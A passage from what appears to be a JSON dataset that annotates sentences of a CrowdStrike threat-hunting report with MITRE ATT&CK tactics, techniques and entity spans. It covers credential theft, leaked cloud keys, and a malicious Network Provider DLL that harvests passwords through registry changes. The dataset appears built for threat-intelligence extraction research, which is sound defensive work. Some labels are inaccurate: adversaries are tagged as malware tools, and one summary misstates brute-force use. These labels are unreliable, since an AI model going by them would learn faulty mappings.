193, "context_before": "Over the past year, 62% of all interactive intrusions used valid accounts.", "sentence_text": "Adversaries do not stop there — 26% of all intrusions involved attempts to dump credentials,8 and 11% involved attempts to target unsecured credentials.9 All of this can facilitate access to sensitive data or support privilege escalation or lateral movement.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" }, { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1003", "name": "OS Credential Dumping" }, { "id": "T1552", "name": "Unsecured Credentials" } ], "procedure": "adversaries dump credentials and target unsecured credentials", "entities": [ { "text": "Adversaries ", "start": 0, "end": 12, "label": "MalwareTool" }, { "text": "dump credentials", "start": 75, "end": 91, "label": "Action" }, { "text": "target unsecured credentials", "start": 123, "end": 151, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p17-s194-19ad7d", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 17, "sentence_id": 194, "context_before": "Adversaries do not stop there — 26% of all intrusions involved attempts to dump credentials,8 and 11% involved attempts to target unsecured credentials.9 All of this can facilitate access to sensitive data or support privilege escalation or lateral movement.", "sentence_text": "Falcon OverWatch also observed adversaries targeting credentials in password stores,10 capturing user input11 and modifying the authentication process12 itself.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1555", "name": "Credentials from Password Stores" }, { "id": "T1056.001", "name": "Keylogging" } ], "procedure": "adversaries target credentials in password stores", "entities": [ { "text": "adversaries ", "start": 31, "end": 43, "label": "MalwareTool" }, { "text": "targeting", "start": 43, "end": 52, "label": "Action" }, { "text": "credentials in password stores", "start": 53, "end": 83, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p17-s195-3ce6c3", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 17, "sentence_id": 195, "context_before": "Falcon OverWatch also observed adversaries targeting credentials in password stores,10 capturing user input11 and modifying the authentication process12 itself.", "sentence_text": "Threat actors are also seeking new and novel tactics in operations aimed at gaining credentials for cloud environments.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p17-s196-e9953d", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 17, "sentence_id": 196, "context_before": "Threat actors are also seeking new and novel tactics in operations aimed at gaining credentials for cloud environments.", "sentence_text": "In November 2022, a victim organization in a CrowdStrike Services case accidentally published its cloud service provider root account’s access key credentials to GitHub.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p17-s197-83c1a2", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 17, "sentence_id": 197, "context_before": "In November 2022, a victim organization in a CrowdStrike Services case accidentally published its cloud service provider root account’s access key credentials to GitHub.", "sentence_text": "Within seconds, automated scanners and multiple threat actors attempted to use the compromised credentials.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1595.002", "name": "Vulnerability Scanning" }, { "id": "T1078.004", "name": "Cloud Accounts" } ], "procedure": "attackers and automated scanners use compromised credentials", "entities": [ { "text": "multiple threat actors", "start": 39, "end": 61, "label": "ThreatActor" }, { "text": "automated scanners", "start": 16, "end": 34, "label": "MalwareTool" }, { "text": "use ", "start": 75, "end": 79, "label": "Action" }, { "text": "compromised credentials", "start": 83, "end": 106, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p17-s198-46a040", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 17, "sentence_id": 198, "context_before": "Within seconds, automated scanners and multiple threat actors attempted to use the compromised credentials.", "sentence_text": "The speed with which this abuse was initiated suggests that multiple threat actors — in efforts to target cloud environments — maintain automated tooling to monitor services such as GitHub for leaked cloud credentials.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1552", "name": "Unsecured Credentials" } ], "procedure": "maintain automated tooling to monitor services such as GitHub for leaked cloud credentials", "entities": [ { "text": "multiple threat actors", "start": 60, "end": 82, "label": "ThreatActor" }, { "text": "cloud environments", "start": 106, "end": 124, "label": "Infrastructure_Indicator" }, { "text": "GitHub", "start": 182, "end": 188, "label": "Infrastructure_Indicator" }, { "text": "maintain automated tooling to monitor services such as GitHub for leaked cloud credentials", "start": 127, "end": 217, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p17-s199-d99149", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 17, "sentence_id": 199, "context_before": "The speed with which this abuse was initiated suggests that multiple threat actors — in efforts to target cloud environments — maintain automated tooling to monitor services such as GitHub for leaked cloud credentials.", "sentence_text": "Defenders may wonder how else adversaries are obtaining these valid login details.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p17-s200-13e1a4", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 17, "sentence_id": 200, "context_before": "Defenders may wonder how else adversaries are obtaining these valid login details.", "sentence_text": "Interestingly, only 14% of intrusions where valid accounts were used also involved a brute-force13 attack.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1110", "name": "Brute Force" } ], "procedure": "some valid accounts were used for brute force attacks", "entities": [ { "text": "brute-force", "start": 85, "end": 96, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p17-s201-3070e7", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 17, "sentence_id": 201, "context_before": "Interestingly, only 14% of intrusions where valid accounts were used also involved a brute-force13 attack.", "sentence_text": "Of the remaining 86% of intrusions involving a valid account, over half originated from a system external to the organization.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p17-s202-b81dd5", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 17, "sentence_id": 202, "context_before": "Of the remaining 86% of intrusions involving a valid account, over half originated from a system external to the organization.", "sentence_text": "This suggests these accounts were likely obtained through credential harvesting, password reuse, phishing, an insider threat, or session hijacking, or they were purchased from an initial access broker.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" }, { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" }, { "id": "T1555", "name": "Credentials from Password Stores" }, { "id": "T1539", "name": "Steal Web Session Cookie" }, { "id": "T1650", "name": "Acquire Access" }, { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "valid accounts were obtained with several methods", "entities": [ { "text": "credential harvesting", "start": 58, "end": 79, "label": "Action" }, { "text": "password reuse", "start": 81, "end": 95, "label": "Action" }, { "text": "phishing", "start": 97, "end": 105, "label": "Action" }, { "text": "insider threat", "start": 110, "end": 124, "label": "Action" }, { "text": "session hijacking", "start": 129, "end": 146, "label": "Action" }, { "text": "purchased from an initial access broker", "start": 161, "end": 200, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p17-s203-ac3aa4", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 17, "sentence_id": 203, "context_before": "This suggests these accounts were likely obtained through credential harvesting, password reuse, phishing, an insider threat, or session hijacking, or they were purchased from an initial access broker.", "sentence_text": "Defensive Countermeasures\nAudit your user accounts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p17-s204-e214bf", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 17, "sentence_id": 204, "context_before": "Defensive Countermeasures\nAudit your user accounts.", "sentence_text": "A key step for defenders in identifying identity-based risks in their organization is auditing the vast array of different user accounts that may be available to an adversary and ensuring that these implement the principle of least privilege and role-based access control.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p17-s205-f5c820", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 17, "sentence_id": 205, "context_before": "A key step for defenders in identifying identity-based risks in their organization is auditing the vast array of different user accounts that may be available to an adversary and ensuring that these implement the principle of least privilege and role-based access control.", "sentence_text": "Leverage the right tools and processes to secure your identities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p17-s206-8ca2b8", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 17, "sentence_id": 206, "context_before": "Leverage the right tools and processes to secure your identities.", "sentence_text": "When it comes to stopping identity threats in their tracks, two key tools at an organization’s disposal are implementing a Zero Trust14 model and implementing proactive and continuous hunting across identity for anomalous user behavior.\n8", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p17-s207-2d9a30", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 17, "sentence_id": 207, "context_before": "When it comes to stopping identity threats in their tracks, two key tools at an organization’s disposal are implementing a Zero Trust14 model and implementing proactive and continuous hunting across identity for anomalous user behavior.\n8", "sentence_text": "For more information on this technique, see the MITRE website: https://attack.mitre.org/techniques/T1003/.\n9", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p17-s208-fbdcad", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 17, "sentence_id": 208, "context_before": "For more information on this technique, see the MITRE website: https://attack.mitre.org/techniques/T1003/.\n9", "sentence_text": "For more information on this technique, see the MITRE website: https://attack.mitre.org/techniques/T1552/.\n10 For more information on this technique, see the MITRE website: https://attack.mitre.org/techniques/T1555/.\n11 For more information on this technique, see the MITRE website: https://attack.mitre.org/techniques/T1056/.\n12 For more information on this technique, see the MITRE website: https://attack.mitre.org/techniques/T1556/.\n13", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p17-s209-4fc415", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 17, "sentence_id": 209, "context_before": "For more information on this technique, see the MITRE website: https://attack.mitre.org/techniques/T1552/.\n10 For more information on this technique, see the MITRE website: https://attack.mitre.org/techniques/T1555/.\n11 For more information on this technique, see the MITRE website: https://attack.mitre.org/techniques/T1056/.\n12 For more information on this technique, see the MITRE website: https://attack.mitre.org/techniques/T1556/.\n13", "sentence_text": "For more information on this technique, see the MITRE website: https://attack.mitre.org/techniques/T1110/.\n14", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p17-s210-c549a1", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 17, "sentence_id": 210, "context_before": "For more information on this technique, see the MITRE website: https://attack.mitre.org/techniques/T1110/.\n14", "sentence_text": "For more information, see https://www.crowdstrike.com/resources/white-papers/streamline-your-zero-trust-journey/.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p18-s211-3c8b16", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 18, "sentence_id": 211, "context_before": "For more information, see https://www.crowdstrike.com/resources/white-papers/streamline-your-zero-trust-journey/.", "sentence_text": "NOWHERE TO HIDE 18 SPOTLIGHT: FALCON OVERWATCH IDENTIFIES MISSING MITRE IDENTITY TECHNIQUE Falcon OverWatch analyzes and records its interactive intrusion data using MITRE ATT&CK as an organizing framework.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p18-s212-fc7021", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 18, "sentence_id": 212, "context_before": "NOWHERE TO HIDE 18 SPOTLIGHT: FALCON OVERWATCH IDENTIFIES MISSING MITRE IDENTITY TECHNIQUE Falcon OverWatch analyzes and records its interactive intrusion data using MITRE ATT&CK as an organizing framework.", "sentence_text": "In the process of examining intrusion activity, analysts occasionally discover new techniques and sub-techniques not accounted for by the framework.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p18-s213-d1b9f5", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 18, "sentence_id": 213, "context_before": "In the process of examining intrusion activity, analysts occasionally discover new techniques and sub-techniques not accounted for by the framework.", "sentence_text": "Falcon OverWatch recently recommended to MITRE the creation of a new sub-technique called “Network Provider DLL” under the technique “Modify Authentication Process.”", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p18-s214-bfda28", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 18, "sentence_id": 214, "context_before": "Falcon OverWatch recently recommended to MITRE the creation of a new sub-technique called “Network Provider DLL” under the technique “Modify Authentication Process.”", "sentence_text": "The new sub-technique was accepted and included in ATT&CK v13 under ID T1556.008.15", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p18-s215-ef525d", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 18, "sentence_id": 215, "context_before": "The new sub-technique was accepted and included in ATT&CK v13 under ID T1556.008.15", "sentence_text": "A network provider DLL enables the Windows operating system to communicate with other types of networks by providing support for different networking protocols.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p18-s216-c379b1", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 18, "sentence_id": 216, "context_before": "A network provider DLL enables the Windows operating system to communicate with other types of networks by providing support for different networking protocols.", "sentence_text": "Because some protocols may involve authentication, a network provider DLL can also function as a credential manager.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p18-s217-267488", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 18, "sentence_id": 217, "context_before": "Because some protocols may involve authentication, a network provider DLL can also function as a credential manager.", "sentence_text": "Over the past year, Falcon OverWatch observed malicious network provider DLLs being abused to harvest usernames and passwords by writing these to disk for exfiltration.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p18-s218-39486d", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 18, "sentence_id": 218, "context_before": "Over the past year, Falcon OverWatch observed malicious network provider DLLs being abused to harvest usernames and passwords by writing these to disk for exfiltration.", "sentence_text": "In multiple intrusions where Modify Authentication Process: Network Provider DLL was leveraged, an adversary was observed conducting intrusions against Microsoft Exchange servers.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0003", "name": "Persistence" }, { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1556.008", "name": "Network Provider DLL" }, { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "intrusions by adversaries against Microsoft exchange servers using network providers DLL", "entities": [ { "text": "intrusions ", "start": 12, "end": 23, "label": "Action" }, { "text": "Modify Authentication Process", "start": 29, "end": 58, "label": "Action" }, { "text": "was leveraged", "start": 81, "end": 94, "label": "Action" }, { "text": "adversary ", "start": 99, "end": 109, "label": "MalwareTool" }, { "text": "intrusions ", "start": 133, "end": 144, "label": "Action" }, { "text": "Network Provider DLL", "start": 60, "end": 80, "label": "Infrastructure_Indicator" }, { "text": "Microsoft Exchange servers", "start": 152, "end": 178, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p18-s219-7ea0b7", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 18, "sentence_id": 219, "context_before": "In multiple intrusions where Modify Authentication Process: Network Provider DLL was leveraged, an adversary was observed conducting intrusions against Microsoft Exchange servers.", "sentence_text": "This specific activity has been observed since at least March 2022, with increasing operational tempo into late 2022.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p18-s220-22cc3d", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 18, "sentence_id": 220, "context_before": "This specific activity has been observed since at least March 2022, with increasing operational tempo into late 2022.", "sentence_text": "This coincides with proof-of-concept code that was publicly released for two vulnerabilities: CVE-2022-41040 and CVE-2022-41082 (collectively, these are commonly referred to as ProxyNotShell).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p18-s221-e1e16c", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 18, "sentence_id": 221, "context_before": "This coincides with proof-of-concept code that was publicly released for two vulnerabilities: CVE-2022-41040 and CVE-2022-41082 (collectively, these are commonly referred to as ProxyNotShell).", "sentence_text": "The unidentified adversary attempted to deploy a malicious network provider DLL onto Exchange systems designed to harvest credentials.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1556.008", "name": "Network Provider DLL" } ], "procedure": "adversary attempted to deploy malicious network provider DLL onto exchange systems", "entities": [ { "text": "adversary ", "start": 17, "end": 27, "label": "MalwareTool" }, { "text": "deploy a malicious network provider DLL", "start": 40, "end": 79, "label": "Action" }, { "text": "Exchange systems", "start": 85, "end": 101, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p18-s222-64ce64", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 18, "sentence_id": 222, "context_before": "The unidentified adversary attempted to deploy a malicious network provider DLL onto Exchange systems designed to harvest credentials.", "sentence_text": "This malicious network provider DLL masqueraded as the LSASS using the name lsass.dll – the entire process is detailed in Figure 8.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036.005", "name": "Match Legitimate Resource Name or Location" } ], "procedure": "malicious DLL masquerades as legitimate dll name", "entities": [ { "text": "This malicious network provider DLL", "start": 0, "end": 35, "label": "MalwareTool" }, { "text": "masqueraded ", "start": 36, "end": 48, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p18-s223-124861", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 18, "sentence_id": 223, "context_before": "This malicious network provider DLL masqueraded as the LSASS using the name lsass.dll – the entire process is detailed in Figure 8.", "sentence_text": "What makes these intrusions notable is that if successfully deployed on an Exchange server, the malicious DLL can be leveraged to access a large number of usernames, emails and passwords without the need to touch LSASS or dump the system SAM hive, both of which are often highly monitored by security tools.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p18-s224-d9d9bb", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 18, "sentence_id": 224, "context_before": "What makes these intrusions notable is that if successfully deployed on an Exchange server, the malicious DLL can be leveraged to access a large number of usernames, emails and passwords without the need to touch LSASS or dump the system SAM hive, both of which are often highly monitored by security tools.", "sentence_text": "This sub-technique does not need to be deployed to an Exchange server, and credentials can still be harvested using this technique on other Windows systems such as user workstations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p18-s225-f2d2dd", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 18, "sentence_id": 225, "context_before": "This sub-technique does not need to be deployed to an Exchange server, and credentials can still be harvested using this technique on other Windows systems such as user workstations.", "sentence_text": "For more information on this sub-technique, see the MITRE website: https://attack.mitre.org/techniques/T1556/008/.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p19-s226-fbb36b", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 19, "sentence_id": 226, "context_before": "For more information on this sub-technique, see the MITRE website: https://attack.mitre.org/techniques/T1556/008/.", "sentence_text": "NOWHERE TO HIDE 19 ADVERSARY CLEARTEXT 1 5 USERNAME/PASSWORD Collects username and Exploits vulnerable password from disk Writes username and Exchange server to reflectively load malicious password to disk for assembly exfiltration Writes malicious DLL to Sends username and System32 folder as password to credential lsass.dll manager DLLs loaded Adds logincontroll value as Queries registered Network a registered Network Providers in registry and loads Provider in registry DLLs specified by ProviderPath value in relevant service Adds NetworkProvider subkey to newly created MPNOTIFY PROCESS 4 service Adds Class registry value Sends username and with data 2 into newly created password via RPC to NetworkProvider subkey mpnotify.exe Adds name registry value with Runs application defined data logincontroll into newly under mpnotify registry key created NetworkProvider or mpnotify.exe when it subkey doesn’t exist Adds ProviderPath registry Queries Winlogon registry key value with data pointing to for mpnotify location of lsass.dll into newly created NetworkProvider subkey Authenticates to USER Exchange server WINLOGON PROCESS 2 3", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1556.008", "name": "Network Provider DLL" } ], "procedure": "procedure of sub-technique (Network Provider DLL)", "entities": [ { "text": "ADVERSARY ", "start": 19, "end": 29, "label": "MalwareTool" }, { "text": "malicious DLL", "start": 237, "end": 250, "label": "MalwareTool" }, { "text": "Writes ", "start": 230, "end": 237, "label": "Action" }, { "text": " password to credential lsass.dll manager", "start": 291, "end": 332, "label": "Action" }, { "text": "DLLs ", "start": 333, "end": 338, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p20-s227-0df8e8", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 20, "sentence_id": 227, "context_before": "NOWHERE TO HIDE 19 ADVERSARY CLEARTEXT 1 5 USERNAME/PASSWORD Collects username and Exploits vulnerable password from disk Writes username and Exchange server to reflectively load malicious password to disk for assembly exfiltration Writes malicious DLL to Sends username and System32 folder as password to credential lsass.dll manager DLLs loaded Adds logincontroll value as Queries registered Network a registered Network Providers in registry and loads Provider in registry DLLs specified by ProviderPath value in relevant service Adds NetworkProvider subkey to newly created MPNOTIFY PROCESS 4 service Adds Class registry value Sends username and with data 2 into newly created password via RPC to NetworkProvider subkey mpnotify.exe Adds name registry value with Runs application defined data logincontroll into newly under mpnotify registry key created NetworkProvider or mpnotify.exe when it subkey doesn’t exist Adds ProviderPath registry Queries Winlogon registry key value with data pointing to for mpnotify location of lsass.dll into newly created NetworkProvider subkey Authenticates to USER Exchange server WINLOGON PROCESS 2 3", "sentence_text": "NOWHERE TO HIDE 20 Left of Theft: Themes of Early-Stage eCrime In recent years, eCrime tradecraft has been one of the most dynamic aspects of the threat landscape.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p20-s228-a04b15", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 20, "sentence_id": 228, "context_before": "NOWHERE TO HIDE 20 Left of Theft: Themes of Early-Stage eCrime In recent years, eCrime tradecraft has been one of the most dynamic aspects of the threat landscape.", "sentence_text": "The most notable change in the past year was the increase in instances of data theft and extortion without the use of ransomware — a trend the CrowdStrike 2023 Global Threat Report revealed grew by 20% year over year in 2022.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p20-s229-ef5a78", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 20, "sentence_id": 229, "context_before": "The most notable change in the past year was the increase in instances of data theft and extortion without the use of ransomware — a trend the CrowdStrike 2023 Global Threat Report revealed grew by 20% year over year in 2022.", "sentence_text": "This Key Facts and development is the latest demonstration of the business acumen of today’s eCrime adversaries and their ability to continually optimize their operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p20-s230-88f0cf", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 20, "sentence_id": 230, "context_before": "This Key Facts and development is the latest demonstration of the business acumen of today’s eCrime adversaries and their ability to continually optimize their operations.", "sentence_text": "Figures at a Although the impact of eCrime operations is often what grabs headlines, what Glance:\nhappens before extortion is what matters most when it comes to proactive defense.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p20-s231-778ebd", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 20, "sentence_id": 231, "context_before": "Figures at a Although the impact of eCrime operations is often what grabs headlines, what Glance:\nhappens before extortion is what matters most when it comes to proactive defense.", "sentence_text": "Falcon OverWatch examines threat activity from a distinctly defensive vantage point.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p20-s232-6ef932", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 20, "sentence_id": 232, "context_before": "Falcon OverWatch examines threat activity from a distinctly defensive vantage point.", "sentence_text": "Rather than focusing retrospectively on the impact of intrusions, threat hunters focus on the patterns of activity that provide the earliest possible 312% signal of intrusion.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p20-s233-03622f", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 20, "sentence_id": 233, "context_before": "Rather than focusing retrospectively on the impact of intrusions, threat hunters focus on the patterns of activity that provide the earliest possible 312% signal of intrusion.", "sentence_text": "Looking back over the past year, Falcon OverWatch hunters INCREASE IN ADVERSARY USE OF uncovered both unexpected and expected trends emerging across interactive RMM TOOLS YEAR OVER YEAR eCrime intrusions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p20-s234-15781e", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 20, "sentence_id": 234, "context_before": "Looking back over the past year, Falcon OverWatch hunters INCREASE IN ADVERSARY USE OF uncovered both unexpected and expected trends emerging across interactive RMM TOOLS YEAR OVER YEAR eCrime intrusions.", "sentence_text": "One development observed by Falcon OverWatch this year is a shift in follow-on behaviors from INDRIK SPIDER.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p20-s235-fb22aa", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 20, "sentence_id": 235, "context_before": "One development observed by Falcon OverWatch this year is a shift in follow-on behaviors from INDRIK SPIDER.", "sentence_text": "Falcon OverWatch saw several instances of otherwise opportunistic initial access activity evolve into more tailored follow-on 147% attack patterns once the threat actor identified that they had caught a lucrative INCREASE IN ACCESS BROKER victim in their widely cast net.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p20-s236-9ad712", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 20, "sentence_id": 236, "context_before": "Falcon OverWatch saw several instances of otherwise opportunistic initial access activity evolve into more tailored follow-on 147% attack patterns once the threat actor identified that they had caught a lucrative INCREASE IN ACCESS BROKER victim in their widely cast net.", "sentence_text": "ADVERTISEMENTS IN CRIMINAL OR UNDERGROUND COMMUNITIES16", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p20-s237-b88cc7", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 20, "sentence_id": 237, "context_before": "ADVERTISEMENTS IN CRIMINAL OR UNDERGROUND COMMUNITIES16", "sentence_text": "This year’s anticipated trends involve the abuse of tried-and-true methods to access and navigate victim environments.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p20-s238-369204", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 20, "sentence_id": 238, "context_before": "This year’s anticipated trends involve the abuse of tried-and-true methods to access and navigate victim environments.", "sentence_text": "These methods include exploitation of vulnerabilities and the use of RMM tools.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" }, { "id": "T1219", "name": "Remote Access Tools" } ], "procedure": "exploitation and use of RMM tools", "entities": [ { "text": "exploitation ", "start": 22, "end": 35, "label": "Action" }, { "text": "RMM tools", "start": 69, "end": 78, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p20-s239-ee228f", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 20, "sentence_id": 239, "context_before": "These methods include exploitation of vulnerabilities and the use of RMM tools.", "sentence_text": "20+% OF ALL INTERACTIVE INTRUSIONS INVOLVED EXPLOITATION OF PUBLIC- FACING APPLICATIONS17", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p20-s240-9f7722", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 20, "sentence_id": 240, "context_before": "20+% OF ALL INTERACTIVE INTRUSIONS INVOLVED EXPLOITATION OF PUBLIC- FACING APPLICATIONS17", "sentence_text": "For more information on how to gain visibility into cybercrime activities, see the CrowdStrike Falcon® Intelligence Recon webpage.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p20-s241-234bb8", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 20, 